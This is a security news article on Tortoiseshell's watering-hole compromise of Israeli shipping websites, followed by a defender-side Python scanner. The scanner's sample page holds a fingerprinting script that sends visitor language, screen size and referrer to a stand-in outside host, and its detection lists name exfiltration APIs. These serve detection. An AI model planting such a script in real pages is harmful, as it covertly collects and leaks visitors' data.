According to research by Tel Aviv-based cybersecurity firm ClearSky, several Israeli shipping and logistics websites were compromised to collect visitor data. The firm attributes the attacks with “low confidence” to the Iranian hacking group Tortoiseshell (also tracked as TA456 and Imperial Kitten). The threat actor was first observed in the wild in July 2018.
At least eight Israeli websites were hit by the campaign, including those of shipping company SNY Cargo, logistics company Depolog, and restaurant equipment supplier SZM. As of Tuesday, April 18th, ClearSky reported that the malicious code had been removed from the vast majority of the affected sites.
Researchers identify a series of watering hole attacks targeting shipping and logistics companies in Israel. Read details here: https://t.co/gLUtrPz07C #infosec #cybersecurity
— The Hacker News (@TheHackersNews) May 24, 2023
In a watering hole attack, the attackers compromise a website frequented by a target demographic, such as government officials, journalists, or corporate leaders. Once the site has been compromised, malicious code injected into it runs whenever a visitor loads the page.
ClearSky researchers found evidence that Iranian hackers have been using watering hole attacks since at least 2017. For instance, in 2018, the Israeli shipping, healthcare, government, and energy sectors were all targeted by a suspected Iranian threat actor tracked as UNC3890.
The recent attacks used malicious JavaScript that records information such as the visitor’s IP address, screen resolution, and the URL of the referring page. ClearSky said the hackers also attempted to identify the visitor’s preferred language in order to tailor future attacks to that language.
In 2020, the Iranian group Emennet Pasargad attacked the hosting service uPress, which hosts the majority of the websites affected in this campaign; thousands of Israeli websites were defaced as a result.
Because of the political animosity between them, Israel and Iran frequently engage in cyber conflict with one another. The Iranian attacks have varying goals, from stealing user data or destroying systems to spreading disinformation.
Over the past two years, the two countries have engaged in an escalating cyber conflict. According to Microsoft, Iranian state-sponsored groups are improving their cyber capabilities, though they still lag behind Russia and China. To penetrate organizations quickly, for instance, they may exploit newly publicized vulnerabilities and employ purpose-built tools.
In the past, Tortoiseshell has carried out a supply chain attack against Saudi IT service providers, using both bespoke and commercially available malware to compromise the clients of the targeted providers.
The current attack was launched from the Tortoiseshell-associated jquery-stack[.]online domain, which attempted to deceive visitors by masquerading as a source for the popular jQuery JavaScript library.
In a prior Iranian campaign in 2017, ClearSky analysts observed domain names imitating jQuery being used in a watering hole attack.
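The two indicators the article describes, a script tag pulling from a jQuery-lookalike domain and an injected inline script that collects the visitor’s language, screen resolution and referrer before sending them off-site, can both be checked for by a site owner scanning their own pages. The following is an added example written for this page, not code from ClearSky or from the article; the allowlist of script hosts is an assumption to be adapted to the site, and the sample page is constructed (it reuses the jquery-stack[.]online domain named above, undefanged so the URL parses, and a reserved .invalid host for the collector).

```python
"""Added example (not from ClearSky's report or the article): a defender-side
scan of a page's HTML for a <script> loaded from a jQuery-lookalike domain and
for an inline script that fingerprints the visitor (language, screen size,
referrer) and sends it off-site. The allowlist and sample HTML are assumptions."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: hosts your site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {
    "code.jquery.com",
    "ajax.googleapis.com",
    "cdnjs.cloudflare.com",
    "cdn.jsdelivr.net",
}

# Browser APIs that expose the fields the article says the script collected.
FINGERPRINT_APIS = ("navigator.language", "screen.width", "screen.height",
                    "document.referrer")
# Ways an inline script can send that data to another server.
EXFIL_APIS = ("XMLHttpRequest", "fetch(", "navigator.sendBeacon", "new Image(")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []  # values of <script src="...">
        self.inline = []    # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def host_of(src):
    """Hostname of a script URL, '' for a relative (same-origin) path."""
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    return (urlparse(src).hostname or "").lower()


def classify_external(src, allowed_hosts):
    """Return a finding label for an off-allowlist script URL, else None."""
    host = host_of(src)
    if not host or host in allowed_hosts:
        return None
    if "jquery" in src.lower():
        return "jquery-lookalike"   # e.g. the jquery-stack[.]online domain
    return "unlisted-external-script"


def is_fingerprint_exfil(body):
    """True if an inline script both reads fingerprint data and sends it out."""
    reads = any(api in body for api in FINGERPRINT_APIS)
    sends = any(api in body for api in EXFIL_APIS)
    return reads and sends


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (label, evidence) tuples for every suspicious script in html."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        label = classify_external(src, allowed_hosts)
        if label:
            findings.append((label, src))
    for body in parser.inline:
        if is_fingerprint_exfil(body):
            findings.append(("fingerprint-and-exfil", " ".join(body.split())[:60]))
    return findings


# Constructed sample page: a legitimate jQuery include, a same-origin script,
# a lookalike include, a benign inline script, and an inline script that
# collects the fields the article lists and posts them to an outside host.
SAMPLE_HTML = """<html><head>
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="/js/app.js"></script>
<script src="https://jquery-stack.online/jquery.min.js"></script>
<script>console.log("page ready");</script>
<script>
var d = {lang: navigator.language, w: screen.width, h: screen.height,
         ref: document.referrer};
var x = new XMLHttpRequest();
x.open("POST", "https://collector.invalid/c"); x.send(JSON.stringify(d));
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for label, evidence in scan_html(SAMPLE_HTML):
        print(f"{label}: {evidence}")
```

Running the scan over the constructed page reports exactly two findings: the lookalike include and the fingerprinting inline script; the legitimate jQuery CDN include, the same-origin script and the harmless inline script are not flagged. The string heuristics are deliberately simple and will miss obfuscated scripts, so they are best used as a cheap integrity check run against a known-good copy of each page rather than as the only control.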
Conclusion
In a watering hole attack, at least eight Israeli websites belonging to shipping, logistics, and financial services organizations were compromised. Tortoiseshell, also known as Crimson Sandstorm (formerly Curium), Imperial Kitten, and TA456, is an Iranian threat actor tracked by ClearSky, a Tel Aviv-based cybersecurity firm. “The infected sites collect preliminary user information through a script,” ClearSky said in a technical report released on Tuesday. The malicious code has since been removed from the majority of the affected websites. As early as July 2018, Tortoiseshell was attacking Saudi Arabian IT service providers, and it has also been seen trying to lure U.S. military veterans into downloading remote access trojans through fake recruitment websites.
This is not the first time that Iranian activity clusters have targeted Israeli ports and businesses. This type of attack, also known as a strategic website compromise, involves infecting a website that is popular among a specific group of Internet users or professionals. In August 2022, a new Iranian actor named UNC3890 was linked to a watering hole installed on the login page of a legitimate Israeli cargo company’s website; it was programmed to send preliminary information about the logged-in user to a domain controlled by the attacker. In the most recently documented intrusions, ClearSky found that malicious JavaScript injected into the websites collected system information and transmitted it to an external server.